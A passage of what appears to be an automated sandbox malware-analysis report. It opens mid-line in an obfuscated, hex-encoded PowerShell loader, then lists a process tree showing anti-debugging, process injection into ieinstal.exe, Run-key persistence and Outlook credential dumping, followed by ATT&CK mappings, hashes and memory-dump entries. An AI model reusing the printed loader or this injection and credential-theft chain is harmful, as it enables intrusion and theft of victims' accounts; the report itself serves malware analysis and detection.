'8A82A8A2A5B4BCFF83A4BFA5B8BCB4FF98BFA5B4A3BEA182B4A3A7B8B2B4A2FF9CB0A3A2B9B0BD8CEBEB92BEA1A8F9F583B8BFB5B4BAA3A2B4BDB4BFFDF1E1FDF1F1F59EA1B3A3A4B5B5B4A5A2E0E0E9E2FDF1E0E0E3E0E1F8';Uskikket9 $Vgavisen0;$Defease=$Rindekrselen.count-11210;$Vgavisen1 = HTB '8A82A8A2A5B4BCFF83A4BFA5B8BCB4FF98BFA5B4A3BEA182B4A3A7B8B2B4A2FF9CB0A3A2B9B0BD8CEBEB92BEA1A8F9F583B8BFB5B4BAA3A2B4BDB4BFFDF1E0E0E3E0E1FDF1F585A3B8B2BAB8BFB6BDA8E0E0E2FDF1F595B4B7B4B0A2B4F8';Uskikket9 $Vgavisen1;$Vgavisen2 = HTB 'F595A8B3B7A3BEA2A5B4BFE5E6F1ECF18A82A8A2A5B4BCFF83A4BFA5B8BCB4FF98BFA5B4A3BEA182B4A3A7B8B2B4A2FF9CB0A3A2B9B0BD8CEBEB96B4A595B4BDB4B6B0A5B497BEA397A4BFB2A5B8BEBF81BEB8BFA5B4A3F9F9B7BAA1F1F585B8A7A8F1F582A4A1B4A3B8BFB7B8A3BCB8A5A8F8FDF1F9969585F191F98A98BFA581A5A38CFDF18A98BFA581A5A38CFDF18A98BFA581A5A38CFDF18A98BFA581A5A38CFDF18A98BFA581A5A38CF8F1F98A98BFA581A5A38CF8F8F8';&($Uskikket7) $Vgavisen2;$Vgavisen3 = HTB 'F595A8B3B7A3BEA2A5B4BFE5E6FF98BFA7BEBAB4F9F59EA1B3A3A4B5B5B4A5A2E0E0E9E2FDF585A3B8B2BAB8BFB6BDA8E0E0E2FDF590BFA5B8BCBEBFB8B2E3E3E4FDE1FDE1F8';&($Uskikket7) $Vgavisen3#"
5⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1836

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
6⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2508

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\gkqkvzqeajmsgnktiecayiiqssrrsgr"
7⤵
PID:4400

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\gkqkvzqeajmsgnktiecayiiqssrrsgr"
7⤵
PID:3944

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\gkqkvzqeajmsgnktiecayiiqssrrsgr"
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3896

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qmvc"
7⤵
- Accesses Microsoft Outlook accounts
PID:4648

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\tganwku"
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3964

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
0f6a3762a04bbb03336fb66a040afb97

SHA1
0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

SHA256
36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

SHA512
cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

Download Submit
C:\Users\Admin\AppData\Local\Temp\gkqkvzqeajmsgnktiecayiiqssrrsgr
Filesize
4KB

MD5
9945b47a62f116c5707cfe39eba4e3a3

SHA1
3a891690b33791216df5ca70ff15c288b8ec3223

SHA256
bec9bca76621ea0f0db461945ca513d00aba466d4cf882a437a8de82075784f1

SHA512
7c0ba560d4332ca00c6b2e3e938c50e7006b0775ba2eec3ff287adf656de508795be097a6a12d9f3cb9a43ac63c0f52f2574ad1cdebe868fd4ac02e683687e48

Download Submit
C:\Windows\Tasks\Proof.vbs
Filesize
244KB

MD5
2bea6452110dc15a82c1ce2338ae9303

SHA1
a7468ff05aefc19fb775b680c2a8b26c231f34c6

SHA256
74aa007c5b52850273540fb6d8906c019348bfa166a4584afae57c50db7acb67

SHA512
b455aa7dc3ff311b40bc6f3b6a0cf3a2176f2d731b0811917337706387969e3aa1cb7ab3dd6ccbde33bd7ed17e8550ab97209deb29b68ee26f439935d992aec6

Download Submit
memory/448-182-0x00007FFD38040000-0x00007FFD38B01000-memory.dmp

Filesize
10.8MB

Download
memory/448-155-0x00007FFD38040000-0x00007FFD38B01000-memory.dmp

Filesize
10.8MB

Download
memory/448-142-0x00007FFD38040000-0x00007FFD38B01000-memory.dmp

Filesize
10.8MB

Download
memory/448-138-0x0000000000000000-mapping.dmp

Download
memory/1836-158-0x00000000772B0000-0x0000000077453000-memory.dmp

Filesize
1.6MB

Download
memory/1836-161-0x00000000772B0000-0x0000000077453000-memory.dmp

Filesize
1.6MB

Download
memory/1836-163-0x00000000772B0000-0x0000000077453000-memory.dmp

Filesize
1.6MB

Download
memory/1836-143-0x0000000002730000-0x0000000002766000-memory.dmp

Filesize
216KB

Download
memory/1836-144-0x0000000005320000-0x0000000005948000-memory.dmp

Filesize
6.2MB

Download
memory/1836-145-0x0000000005190000-0x00000000051B2000-memory.dmp

Filesize
136KB

Download
memory/1836-146-0x0000000005230000-0x0000000005296000-memory.dmp

Filesize
408KB

Download
memory/1836-147-0x00000000052A0000-0x0000000005306000-memory.dmp

Filesize
408KB

Download
memory/1836-148-0x0000000006050000-0x000000000606E000-memory.dmp

Filesize
120KB

Download
memory/1836-149-0x00000000077D0000-0x0000000007E4A000-memory.dmp

Filesize
6.5MB

Download
memory/1836-150-0x00000000065A0000-0x00000000065BA000-memory.dmp

Filesize
104KB

Download
memory/1836-151-0x0000000007350000-0x00000000073E6000-memory.dmp

Filesize
600KB

Download
memory/1836-152-0x0000000007080000-0x00000000070A2000-memory.dmp

Filesize
136KB

Download
memory/1836-153-0x000000000CE40000-0x000000000D3E4000-memory.dmp

Filesize
5.6MB

Download
memory/1836-154-0x0000000006680000-0x0000000006683000-memory.dmp

Filesize
12KB

Download
memory/1836-141-0x0000000000000000-mapping.dmp

Download
memory/1836-156-0x0000000007E50000-0x000000000C881000-memory.dmp

Filesize
74.2MB

Download
memory/1836-157-0x00007FFD561B0000-0x00007FFD563A5000-memory.dmp

Filesize
2.0MB

Download
memory/2508-164-0x00007FFD561B0000-0x00007FFD563A5000-memory.dmp

Filesize
2.0MB

Download
memory/2508-165-0x00000000772B0000-0x0000000077453000-memory.dmp

Filesize
1.6MB

Download
memory/2508-160-0x0000000001090000-0x0000000005AC1000-memory.dmp

Filesize
74.2MB

Download
memory/2508-177-0x0000000001000000-0x0000000001019000-memory.dmp

Filesize
100KB

Download
memory/2508-162-0x0000000001090000-0x0000000005AC1000-memory.dmp

Filesize
74.2MB

Download
memory/2508-185-0x00000000772B0000-0x0000000077453000-memory.dmp

Filesize
1.6MB

Download
memory/2508-159-0x0000000000000000-mapping.dmp

Download
memory/2508-166-0x00000000772B0000-0x0000000077453000-memory.dmp

Filesize
1.6MB

Download
memory/2508-183-0x0000000001000000-0x0000000001019000-memory.dmp

Filesize
100KB

Download
memory/2508-181-0x0000000001000000-0x0000000001019000-memory.dmp

Filesize
100KB

Download
memory/2508-180-0x0000000001000000-0x0000000001019000-memory.dmp

Filesize
100KB

Download
memory/2508-184-0x00007FFD561B0000-0x00007FFD563A5000-memory.dmp

Filesize
2.0MB

Download
memory/3896-169-0x0000000000000000-mapping.dmp

Download
memory/3896-175-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3896-174-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3944-168-0x0000000000000000-mapping.dmp

Download
memory/3964-173-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3964-171-0x0000000000000000-mapping.dmp

Download
memory/4400-167-0x0000000000000000-mapping.dmp

Download
memory/4488-135-0x0000000000000000-mapping.dmp

Download
memory/4648-170-0x0000000000000000-mapping.dmp

Download
memory/4648-172-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/4844-134-0x00007FFD37DA0000-0x00007FFD38861000-memory.dmp

Filesize
10.8MB

Download
memory/4844-133-0x000001845E0B0000-0x000001845E0D2000-memory.dmp

Filesize
136KB

Download
memory/4844-132-0x0000000000000000-mapping.dmp

Download
memory/4844-137-0x00007FFD37DA0000-0x00007FFD38861000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads